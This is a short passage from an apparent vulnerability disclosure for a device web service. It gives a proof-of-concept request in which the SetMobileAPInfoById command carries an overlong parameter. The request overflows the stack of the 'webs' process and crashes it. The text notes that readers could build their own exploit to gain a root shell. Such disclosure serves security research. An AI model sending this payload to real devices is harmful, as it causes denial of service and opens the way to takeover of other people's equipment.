CMD=SetMobileAPInfoById&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service. !\[\](https://i.imgur.com/GxAXxkM.png) We can see process webs is crashed and restarted. !\[\](https://i.imgur.com/Ap2kSe4.png) And you can write your own exp to get the root shell.

Tag

#dos